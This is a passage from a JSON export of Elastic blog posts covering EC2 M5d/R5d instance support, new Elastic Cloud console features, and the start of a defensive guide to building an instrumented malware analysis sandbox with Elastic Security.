href=\"https://www.elastic.co/guide/en/cloud/current/ec-getting-started-templates.html\"\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt41d7db265248bc4f/5ef96083bbb71f1e548e107f/m5dr5d_blog_deplyoment_templates.png\" data-sys-asset-uid=\"blt41d7db265248bc4f\" alt=\"AWS_EC2_m5d_r5d_Elastic_Cloud_deployment_templates.png\" \"=\"\"\u003e\u003c/a\u003e\u003cbr\u003e\n\u003c/p\u003e\n\u003ch2\u003eImproved disk performance\u003c/h2\u003e\n\u003cp\u003eBoth of the new M5d and R5d instance families support locally attached NVMe SSD drives, which offer higher throughput and lower latency when compared to Elastic Block Storage (EBS) General Purpose GP2 SSD volumes.\n\u003c/p\u003e\n\u003ch2\u003eTake advantage of new instances\u003c/h2\u003e\n\u003cp\u003eYou automatically benefit from the performance enhancements offered by the M5d and R5d instance families when you launch any new deployment.\u0026nbsp;\n\u003c/p\u003e\n\u003c!-- Put this wherever you would like your player to appear --\u003e\n\u003cp\u003e\u003cimg class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/L5ygMnFh7af7bwDrGX6Wx1.jpg\" data-uuid=\"L5ygMnFh7af7bwDrGX6Wx1\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-disable_analytics=\"1\" data-hidden_controls=\"1\" data-muted=\"0\" style=\"width: 100%; margin: auto; display: block;\"\u003e\n\u003c/p\u003e\n\u003c!-- The script tag should live in the head of your page if at all possible --\u003e\n\u003c!-- Put this wherever you would like your player to appear --\u003e\n\u003cp\u003eYou can also migrate your existing deployments to use the new deployment templates and upgraded instance families.\n\u003c/p\u003e\n\u003ch2\u003eMigrate an existing deployment\u003c/h2\u003e\n\u003cp\u003eTo migrate an existing deployment, you must first snapshot your existing deployment. Follow the create deployment workflow and restore your snapshot as follows:\u0026nbsp;\n\u003c/p\u003e\n\u003col\u003e\n\t\u003cli\u003eClick “Create deployment”\u003c/li\u003e\n\t\u003cli\u003eSelect Amazon Web Services as your cloud platform\u003c/li\u003e\n\t\u003cli\u003eSelect the region that your existing deployment is located in\u003c/li\u003e\n\t\u003cli\u003eSelect a deployment to restore from one of its snapshot\u003c/li\u003e\n\t\u003cli\u003eRestore from snapshot\u003c/li\u003e\n\t\u003cli\u003eChoose your preferred deployment template\u003c/li\u003e\n\t\u003cli\u003eCreate deployment\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eYou can learn more in our \u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-create-deployment.html\"\u003emigration documentation\u003c/a\u003e.\n\u003c/p\u003e\n\u003ch2\u003eGet started\u003c/h2\u003e\n\u003cp\u003eLog in to the \u003ca href=\"https://cloud.elastic.co\"\u003eElastic Cloud console\u003c/a\u003e or \u003ca href=\"https://www.elastic.co/elasticsearch/service\"\u003esign up for a free 14-day trial\u003c/a\u003e to get started with these new instance types. To learn more about the hardware we use, visit our product \u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-reference-hardware.html#ec_amazon_ec2_aws\"\u003edocumentation page\u003c/a\u003e.\u0026nbsp;\n\u003c/p\u003e","category":[],"created_at":"2020-06-29T04:10:34.868Z","created_by":"bltac080fee37d61d25","date_localized":null,"disclaimer":[],"full_bleed_image":{"_version":2,"is_dir":false,"uid":"blt612c5f584fc2b60f","ACL":{},"content_type":"image/png","created_at":"2019-12-03T04:04:50.681Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"29407","filename":"blog-banner-elasticsearch-service.png","parent_uid":null,"tags":[],"title":"blog-banner-elasticsearch-service.png","updated_at":"2021-01-26T18:52:13.338Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:21.983Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt612c5f584fc2b60f/601064dd0a80720ff10f3843/blog-banner-elasticsearch-service.png"},"industry":[],"level":["introduction"],"markdown_l10n":"","newsfeed":["blt7431c38caf6a609d"],"popular_topics":[],"product":["elastic cloud"],"publish_date":"2020-07-01T14:45:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"Introducing support for Amazon EC2 M5d and R5d instances on Elastic Cloud","seo_description_l10n":"Amazon EC2 M5d general purpose and R5d memory-optimized instances are now used Elastic Cloud’s deployment templates, in all supported AWS EC2 regions. They offer higher throughput and lower latency.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":"Announcing higher throughput, lower latency #Amazon #EC2 M5d general purpose and R5d memory-optimized instances in all supported AWS regions on #ElasticCloud\nLearn more"},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"bltafdb405305a79bcc","ACL":{},"content_type":"image/png","created_at":"2019-12-03T04:04:50.716Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"25521","filename":"blog-thumb-elasticsearch-service.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-elasticsearch-service.png","updated_at":"2022-02-11T21:03:43.566Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:28.248Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltafdb405305a79bcc/601064cf6e1217102724a493/blog-thumb-elasticsearch-service.png"},"title":"Introducing support for Amazon EC2 M5d and R5d instances on Elastic Cloud","title_l10n":"Introducing support for Amazon EC2 M5d and R5d instances on Elastic Cloud","updated_at":"2024-08-14T10:25:52.024Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/amazon-ec2-m5d-r5d-instances-on-elastic-cloud","use_case":[],"versions":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:07:30.293Z","user":"blt36e890d06c5ec32c"}},{"_version":30,"locale":"en-us","uid":"bltd12b76052008b6d3","ACL":{},"abstract_l10n":"Benefit from more flexibility and reliability with new purchasing options, improved change management, and faster hardware.","author":["blta469eec733f1f129"],"body_l10n":"\u003cp\u003eWe’re pleased to introduce you to the latest Elastic Cloud features and functionality. Grab a cup of your favorite beverage and five minutes, and let’s dive in:\u003cbr\u003e\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch2\u003eNew self-service subscription options\u003c/h2\u003e\u003c/strong\u003e\n\u003cp\u003eYou can now purchase Gold and Platinum monthly subscriptions directly within the Elastic Cloud console. With just a few clicks, you’ll get access to support SLAs and the exclusive capabilities of the Elastic Stack, including our solutions for enterprise search, observability, and security. We have a \u003ca href=\"https://www.elastic.co/pricing/philosophy\"\u003eresource-based approach to pricing\u003c/a\u003e. You can find the subscription details on our \u003ca href=\"https://www.elastic.co/pricing\"\u003epricing page\u003c/a\u003e, including a side-by-side feature and support comparison as well as frequently asked questions.\u0026nbsp;\n\u003c/p\u003e\n\u003cp\u003eYou can also change your subscription level directly in the console as your business evolves. When you upgrade from Standard to Gold or Platinum, you’ll get instant access to the features and benefits within your selected plan.\n\u003c/p\u003e\u003ccenter\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6db1500c23e84059/5efb9c30da5e1e294fcd9023/subscription_change_elastic_cloud_console.png\" data-sys-asset-uid=\"blt6db1500c23e84059\" alt=\"Updating your subscription in the Elastic Cloud console\" \"=\"\"\u003e\u003c/center\u003e\n\u003cp\u003e\u003cbr\u003e\n\u003c/p\u003e\n\u003cp\u003eMonthly billing allows you to analyze and adjust your subscription usage without entering into a long-term commitment. This flexibility can be useful as you determine which features make the most sense for your use case and how much of the service you need to consume. When your deployment size and feature requirements become clear, you can switch and commit to an annual subscription with deeper discounts.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch2\u003eIn-place configuration changes\u003c/h2\u003e\u003c/strong\u003e\n\u003cp\u003eIn-place changes allow for faster and more reliable configuration updates. Their speed and reliability come from applying changes to the cluster (like settings, upgrades, and resizing) in place, which is followed by a rolling restart of its nodes. This avoids potentially long-running data migration operations inherent with the \u003ca href=\"https://www.elastic.co/guide/en/cloud-enterprise/current/ece-change-deployment.html\"\u003egrow-and-shrink\u003c/a\u003e approach.\u0026nbsp;\n\u003c/p\u003e\n\u003cp\u003eWhen you change your deployment’s configuration, Elastic Cloud will choose the optimal strategy to apply the changes, using either grow-and-shrink or in-place configuration change as appropriate.\n\u003c/p\u003e\n\u003cp\u003e\u003cbr\u003e\n\u003c/p\u003e\u003ccenter\u003e\n\u003c!-- The script tag should live in the head of your page if at all possible --\u003e\n\u003c!-- Put this wherever you would like your player to appear --\u003e\n\u003cp\u003e\u003cimg style=\"width: 100%; margin: auto; display: block;\" class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/PWmPzULwfWi9Wd4HXwipjv.jpg\" data-uuid=\"PWmPzULwfWi9Wd4HXwipjv\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-disable_analytics=\"1\" data-hidden_controls=\"1\" data-muted=\"0\" alt=\"Using the Elastic Cloud console to apply configuration changes in place\"\u003e\n\u003c/p\u003e\u003c/center\u003e\n\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\n\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eAWS M5d and R5d instance types\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003eAmazon EC2 M5d general purpose and R5d memory-optimized instances are now used in all supported Amazon Web Services (AWS) regions on Elastic Cloud.\n\u003c/p\u003e\u003ccenter\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5cb4a0a4704b4846/5efb9ccf7a4c91297609354a/elastic_cloud_aws_r5d_m5d_instances.png\" data-sys-asset-uid=\"blt5cb4a0a4704b4846\" alt=\"New Elastic Cloud AWS R5d and M5d instances\" \"=\"\"\u003e\u003c/center\u003e\n\u003cp\u003e\u003cbr\u003e\n\u003c/p\u003e\n\u003cp\u003eThese instance types offer improved disk performance via locally attached NVMe SSD drives. These drives offer higher throughput and lower latency when compared to EC2’s Elastic Block Storage (EBS) General Purpose GP2 SSD volumes from the previous m5 and r4 instances. You can learn more about these new instances in our \u003ca href=\"https://www.elastic.co/blog/amazon-ec2-m5d-r5d-instances-on-elastic-cloud\"\u003eblog post\u003c/a\u003e.\n\u003c/p\u003e \u003cstrong\u003e\n\u003ch2\u003eSign up with your Google account\u003c/h2\u003e\u003c/strong\u003e\n\u003cp\u003eYou can now sign up for Elastic Cloud using your Google Account. Signing up is easy: with a couple clicks you can use your Google identity to access your Elastic Cloud account instead of maintaining separate credentials.\u0026nbsp;\n\u003c/p\u003e\u003cstrong\u003e\n\u003ch2\u003eGetting started\u003c/h2\u003e\u003c/strong\u003e\n\u003cp\u003eLog in to the \u003ca href=\"https://cloud.elastic.co/home\"\u003eElastic Cloud console\u003c/a\u003e to get started. If you’re new to Elastic Cloud, \u003ca href=\"https://www.elastic.co/cloud/elasticsearch-service/signup?elektra=ms-39-announcement-blog\"\u003esign up for a free 14-day trial\u003c/a\u003e with your Google Account and try it out.\u0026nbsp;\n\u003c/p\u003e","category":[{"_version":5,"locale":"en-us","uid":"blt0c9f31df4f2a7a2b","ACL":{},"created_at":"2018-08-27T12:32:48.561Z","created_by":"sys_blt57a423112de8a853","key":"company-news","label_l10n":"News","tags":[],"title":"News","updated_at":"2024-05-10T13:44:22.885Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-29T20:00:07.956Z","user":"blt27204bf9f7abb7fd"}}],"created_at":"2020-06-29T22:02:56.811Z","created_by":"bltac080fee37d61d25","date_localized":null,"disclaimer":[],"full_bleed_image":{"_version":2,"is_dir":false,"uid":"blt612c5f584fc2b60f","ACL":{},"content_type":"image/png","created_at":"2019-12-03T04:04:50.681Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"29407","filename":"blog-banner-elasticsearch-service.png","parent_uid":null,"tags":[],"title":"blog-banner-elasticsearch-service.png","updated_at":"2021-01-26T18:52:13.338Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:21.983Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt612c5f584fc2b60f/601064dd0a80720ff10f3843/blog-banner-elasticsearch-service.png"},"industry":[],"level":["introduction"],"markdown_l10n":"","newsfeed":["blt7431c38caf6a609d"],"popular_topics":[],"product":["elastic cloud"],"publish_date":"2020-07-01T14:50:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"New on Elastic Cloud: Self-service subscriptions, in-place configuration changes","seo_description_l10n":"Benefit from more flexibility and reliability with new purchasing options, improved change management, and faster hardware with the latest Elastic Cloud release. It's the best way to experience managed Elasticsearch and Kibana as a service.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"bltafdb405305a79bcc","ACL":{},"content_type":"image/png","created_at":"2019-12-03T04:04:50.716Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"25521","filename":"blog-thumb-elasticsearch-service.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-elasticsearch-service.png","updated_at":"2022-02-11T21:03:43.566Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:28.248Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltafdb405305a79bcc/601064cf6e1217102724a493/blog-thumb-elasticsearch-service.png"},"title":"New on Elastic Cloud: Self-service subscriptions, in-place configuration changes","title_l10n":"New on Elastic Cloud: Self-service subscriptions, in-place configuration changes","updated_at":"2024-08-14T10:25:33.632Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/elastic-cloud-self-service-subscriptions-in-place-configuration-aws-ec2-instances","use_case":[],"versions":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:07:27.277Z","user":"blt36e890d06c5ec32c"}},{"uid":"bltaec2d43b201b24c8","_version":9,"locale":"en-us","ACL":{},"abstract_l10n":"In this blog post, we will demonstrate how the Elastic Infosec team uses the Elastic Stack with Elastic Endpoint Security to build a fully instrumented malware analysis sandbox using free software.","author":["blt06048a64b0c2b959"],"body_l10n":"\u003cp\u003eAs a security analyst on Elastic’s InfoSec team, a common scenario we see is users coming to our team and asking: “Is this file safe to open?” Or one user reports a phishing email with an attachment that they didn’t open, but we see from the logs that 10 other users also received that email but didn’t report it and no alerts went off on their systems. A common attack we see is phishing emails containing attachments that do not contain malicious code and thus do not set off any alerts, but they attempt to social engineer a user to steal their password.\n\u003c/p\u003e\u003cp\u003eIn these situations, the security team needs to quickly find out what has occurred on one of their systems when a file is executed to determine whether it would have been detected or stopped. If it wasn’t, they need to quickly understand what actions were taken on the host. In these cases, the security team needs to have a well-instrumented virtual machine (VM) sandbox that they can use to safely execute the file in question and observe what happens. The Elastic InfoSec team is always \u003ca href=\"https://www.elastic.co/blog/elastic-on-elastic-how-infosec-deploys-infrastructure-and-stays-up-to-date-with-eck\"\u003epushing the limits\u003c/a\u003e with Elastic products as part of our \u003ca href=\"https://www.elastic.co/blog/securing-our-own-endpoints-with-elastic-security\"\u003eCustomer Zero\u003c/a\u003e effort so we decided to build a sandbox using Elastic products.\n\u003c/p\u003e\u003cp\u003eIn this blog post, I will demonstrate how the Elastic InfoSec team uses Fleet and Elastic Security as a fully instrumented malware sandbox. Not only is Elastic a natural fit for instrumenting and collecting data from a sandbox, it is also easy to build and can be created within minutes.\n\u003c/p\u003e\u003cdiv class=\"video embed-container\" style=\"height: 319.725px;\"\u003e\n\t\u003cimg style=\"width: 100%; margin: auto; display: block;\" class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/ZNSnCtFKSVHcVd9PMd7ecR.jpg\" data-uuid=\"ZNSnCtFKSVHcVd9PMd7ecR\" data-v=\"4\" data-type=\"inline\" data-autoplay=\"1\" data-loop=\"1\" data-disable_analytics=\"1\" data-hidden_controls=\"1\" data-muted=\"1\" disable_analytics=\"1\"\u003e\n\u003c/div\u003e\u003ch2\u003eWhat is dynamic malware analysis?\u003c/h2\u003e\u003cp\u003eDynamic malware analysis is the act of executing and observing a suspicious piece of software inside an isolated VM. The goal of dynamic analysis is to learn:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003eWhat processes the malware executes\u003c/li\u003e\n\t\u003cli\u003eWhat changes it makes to a host\u003c/li\u003e\n\t\u003cli\u003eWhat network connections it makes\u003c/li\u003e\n\t\u003cli\u003eWhat files it downloads for the second or third stage of the attack\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eAfter observing the malware, you can take the information learned to create new detections and defenses, or hunt for other malicious activity within your network.\n\u003c/p\u003e\u003ch2\u003eWhy Elastic?\u003c/h2\u003e\u003cp\u003eIf you have ever created a sandbox environment for observing and analyzing malware, you know that setting up your sandbox can be a time-consuming process involving installation and configuration of dozens of different pieces of software. This can involve installing and configuring a collection of software such as Wireshark, Regshot, and ProcMon to manually step through the execution of the malware while observing and documenting the actions.\n\u003c/p\u003e\u003cp\u003eThere are advanced dynamic malware analysis sandbox systems such as \u003ca href=\"https://cuckoosandbox.org/\"\u003eCuckoo Sandbox\u003c/a\u003e that have lots of features and capabilities such as automation, but they usually require much longer to set up and configure and may not be necessary for every InfoSec team. Many of the phishing malware samples we have seen recently are social engineering attempts to steal credentials that require user interaction. In these cases the automated systems may not collect all of the indicators of compromise.\n\u003c/p\u003e\u003cp\u003eSome malware samples will check for the existence of many of these tools and stop executing, making them harder to analyze. Other malware will even actively search out these tools and kill the processes or overwrite the logs inside the sandbox. Because of this, dynamic malware analysis can be time-consuming when you are working an active incident that needs immediate attention.\n\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/endpoint-security/\"\u003eElastic Endpoint Security\u003c/a\u003e is a single agent that collects information about actions happening on the system and quickly visualizes the process tree for analysts. This makes for quick and easy investigation into what exactly happened and provides you with the indicators you need to improve your detections and protections. The Analyzer view in Elastic Security visualizes the entire process tree for you, showing you all the child processes and their associated indicators created by the initial malware process.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt059d3e31011e8477/601941b137c7bc6afba50b3f/malware-analysis-sandbox-analyzer-view-emotet.jpg\" data-sys-asset-uid=\"blt059d3e31011e8477\" alt=\"Analyzer view lets you quickly visualize a process tree and see the actions taken by a process\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003ch2\u003eCreating your sandbox\u003c/h2\u003e\u003cp\u003eThere are several different reasons to use a malware analysis sandbox. For this use case, our goal is to have a virtual environment that is similar to a standard enterprise build, but that is also thoroughly instrumented so we can observe every action the malware initiates.\n\u003c/p\u003e\u003cp\u003eWhen creating your sandbox, you may want to create two images for each build: a ‘hardened image’ that is built with the same protections you have in your enterprise, and another ‘vulnerable image’ that has most of the protections turned off. The advantage of having two images is that the hardened image will show you what would happen in your environment if someone executed the file, while the vulnerable image will show you the full execution of the malware. In a large enough enterprise, there are almost always systems that have had some protections disabled, so I recommend both methods.\n\u003c/p\u003e\u003ch2\u003eCreating test systems\u003c/h2\u003e\u003cp\u003eThe first step is to create the VMs used to execute the files. Any virtualization software can be used to build the images. I won’t be covering the setup of your virtualization software, but it is important to isolate the systems from your host and enterprise network as much as possible when executing the malware. In this scenario I will build a Windows 10 VM and a MacOS image. If you have a standard Linux build for your enterprise you could build one of those as well.\n\u003c/p\u003e\u003cp\u003eAfter creating your VMs, I recommend installing all of the commonly used software that you have in your domain, such as MS Office, Adobe Reader, or Python. Anything that your users would use to execute a file should be included in the sandbox. On your Windows VMs, I recommend enabling \u003ca href=\"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1\"\u003ePowerShell ScriptBlock logging\u003c/a\u003e. ScriptBlock logging will save the full text of any executed PowerShell scripts to your Windows event logs that can be collected with Elastic Agent. When configuring your ‘vulnerable’ VM, you will need to change multiple settings to disable all of the built-in OS protections. Some advanced Windows malware will check to see if the host is part of a domain prior to downloading the second stage, so you may want to configure your VM to add it to a fake domain that has a similar name to your enterprise.\n\u003c/p\u003e\u003cp\u003eIf you wish to also collect Sysmon data from the Windows host, you can do that as well. The Elastic Endpoint agent collects most of the same information as Sysmon, so you may want to customize the Sysmon configuration so as not to duplicate the data. Once you have installed and configured Sysmon, the Elastic Agent can stream those events to your cluster using the Windows integration.\n\u003c/p\u003e\u003ch2\u003eConfiguring your Elastic Security cluster\u003c/h2\u003e\u003cp\u003eFor this testing I used Elastic 7.10 running within \u003ca href=\"https://cloud.elastic.co/\"\u003eElastic Cloud\u003c/a\u003e. Setting up your cluster in Elastic Cloud is the easiest way to create and host a new cluster for testing and can get you up and running within minutes with all of the Platinum subscription features. If you want to build a completely isolated sandbox, you can set up your own on-prem \u003ca href=\"https://www.elastic.co/downloads/\"\u003eElastic Stack\u003c/a\u003e. If you’re going on-prem, you can follow \u003ca href=\"https://www.elastic.co/guide/en/elastic-stack/current/installing-elastic-stack.html\"\u003ethese instructions\u003c/a\u003e to install the Elastic Stack, and everything covered in this blog is included free of charge through our free Basic tier.\n\u003c/p\u003e\u003cp\u003eAfter you have created your cluster in Elastic Cloud, you will need to log in and configure Elastic Security. If you want to watch a video walkthrough of the setup, we have one \u003ca href=\"https://www.elastic.co/training/elastic-security-quick-start\"\u003eavailable here\u003c/a\u003e.\n\u003c/p\u003e\u003ch2\u003eSetup\u003c/h2\u003e\u003cp\u003eThe first step is to log into Kibana as an administrator and navigate to the Security \u0026gt; Administration \u0026gt; Endpoints tab and select \u003cstrong\u003eAdd Endpoint Security\u003c/strong\u003e.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt41f965b273038ee7/6019420f61513a1aa7473c74/malware-analysis-sandbox-endpoints-getting-started.jpg\" data-sys-asset-uid=\"blt41f965b273038ee7\" alt=\"Endpoint Security administration setup view\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eFirst you need to create a security integration. Give your integration a name and select \u003cstrong\u003eSave integration\u003c/strong\u003e. You can create multiple integrations and Agent policies, but the easiest thing to do for this sandbox is to use a single policy for all of your sandbox systems. A single policy will work for your Linux, Windows, and MacOS systems.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt616370cf3b2df61a/6019424adb520b688d825e90/malware-analysis-sandbox-add-security-integration.jpg\" data-sys-asset-uid=\"blt616370cf3b2df61a\" alt=\"Elastic Agent page to add an integration\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eSelect your integration and select \u003cstrong\u003eEnroll Agent\u003c/strong\u003e. In the screen that appears, confirm that you want to \u003cstrong\u003eEnroll in Fleet\u003c/strong\u003e. This will let you configure and control your agents entirely through Kibana.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfb248b4db291e4c2/601942ca52af9c14d9056875/malware-analysis-sandbox-enroll-agent.jpg\" data-sys-asset-uid=\"bltfb248b4db291e4c2\" alt=\"Enroll an agent with Endpoint Security\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eIf you want to also collect Windows event logs, select \u003cstrong\u003eAdd integration\u003c/strong\u003e, select \u003cstrong\u003eWindows\u003c/strong\u003e from the premade integrations, use the default settings, then select \u003cstrong\u003eSave Integration\u003c/strong\u003e to collect the Windows Security events, Sysmon events, PowerShell Scriptblock logging, and any Windows event logs that are configured to be forwarded.\n\u003c/p\u003e\u003cp\u003eAt this time you should have a default policy configured that will deploy endpoint security, the System module, and Windows event logs from Windows systems.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt378dfaa1dbbf9f23/601942f952af9c14d9056879/malware-analysis-sandbox-fleet-agent-policy-view.jpg\" data-sys-asset-uid=\"blt378dfaa1dbbf9f23\" alt=\"Fleet agent policy view\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eNow you are ready to deploy your agents to your sandbox systems. Select the \u003cstrong\u003eAgents\u003c/strong\u003e tab. If this is your first agent then you will need to be an admin and then select the button to automatically create the Fleet user in Kibana. Then click \u003cstrong\u003eAdd Agent\u003c/strong\u003e, which will direct you to the \u003ca href=\"https://ela.st/download-elastic-agent\"\u003eElastic Agent download page\u003c/a\u003e and show you the commands you will need to run to install the agent on your VMs. After you download and install the agent you should see it appear automatically in the Agents list.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt98ff9045d3dbc80b/6019431d0f1c0c1aa6f87cd8/malware-analysis-sandbox-agents-view.jpg\" data-sys-asset-uid=\"blt98ff9045d3dbc80b\" alt=\"Agent status view\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eWithin Elastic Security, you will need to configure the \u003cstrong\u003eIntegration Policy\u003c/strong\u003e of the Elastic Endpoint agents. The \u003cstrong\u003eAgent Policy\u003c/strong\u003e sets the policy for the Elastic Agent while the \u003cstrong\u003eIntegration Policy\u003c/strong\u003e sets the policy for the endpoint security integration deployed by the agent. The endpoint security integration policy can be set in the \u003cstrong\u003eAdministration\u003c/strong\u003e tab in Elastic Security. Select the \u003cstrong\u003eIntegration Policy\u003c/strong\u003e next to one of your agents to open the view.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9f4770c9c6eeacd1/6019434252af9c14d905687d/malware-analysis-sandbox-endpoint-integration-policy.jpg\" data-sys-asset-uid=\"blt9f4770c9c6eeacd1\" alt=\"Endpoint Security integration policy view\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eThis will bring up the \u003cstrong\u003eIntegrations Settings\u003c/strong\u003e view. Within this view make sure that \u003cstrong\u003eMalware Protections Enabled\u003c/strong\u003e is toggled on, and that the \u003cstrong\u003eProtection Level\u003c/strong\u003e is set to \u003cstrong\u003eDetect\u003c/strong\u003e, not \u003cstrong\u003ePrevent\u003c/strong\u003e. If you have malware protections on but place them into detect mode, you will see the malware detection alerts but Elastic Security will not take any actions to stop the malware.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt80ea24207861ec87/6019436a4b8030688c37a99a/malware-analysis-sandbox-malware-protections-detect-mode.jpg\" data-sys-asset-uid=\"blt80ea24207861ec87\" alt=\"malware-analysis-sandbox-malware-protections-detect-mode.jpg\"\u003e\n\u003c/p\u003e\u003cp\u003eThe next step is to take an extra minute to set up your \u003ca href=\"https://www.elastic.co/guide/en/security/current/detection-engine-overview.html\"\u003edetection engine\u003c/a\u003e in Elastic Security and install all of the included prebuilt Elastic detection rules. You don’t have to do this for your sandbox, but it is easy to do and will very often detect the malware’s actions — making triage easier. To do this, just select the \u003cstrong\u003eDetections\u003c/strong\u003e tab in Elastic Security and then select \u003cstrong\u003eManage detection rules\u003c/strong\u003e. From there, click \u003cstrong\u003eLoad Elastic prebuilt rules and timeline templates\u003c/strong\u003e. You will have to do this as an administrator the first time around.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt28c0b3ed07f23d26/601943b40f1c0c1aa6f87cdc/malware-analysis-sandbox-detection-engine-view.jpg\" data-sys-asset-uid=\"blt28c0b3ed07f23d26\" alt=\"Detection engine view\" style=\"display: block; margin: 